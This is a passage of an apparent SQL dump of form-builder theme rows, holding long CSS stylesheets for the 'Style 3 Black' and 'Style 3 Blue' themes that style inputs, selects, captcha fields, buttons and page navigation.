select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_select select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.time_box\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#E96711 !important;\nfont-style:italic !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#ffffff !important;\nheight:18px !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E96711 !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #AB0101 !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #FF8F00 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\nspan.wdform_page_button\n{\ncolor:#000000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#AB0101 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\n	font-family:"Times New Roman", Times, serif !important;\nmargin:0px -30px 0px 0px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\n	font-family:"Times New Roman", Times, serif !important;\ncolor:#000000 !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #E96711 !important;\nborder-radius:1px !important;\n}', 0),
(16, 'Style 3 Black', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left !important;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_select select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.time_box\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#E96711 !important;\nfont-style:italic !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#ffffff !important;\nheight:18px !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E96711 !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #000000 !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #FF8F00 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#000000 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\nmargin:0px -30px 0px 0px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #E96711 !important;\nborder-radius:1px !important;\n}', 0),
(17, 'Style 3 Blue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#56AEEE !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 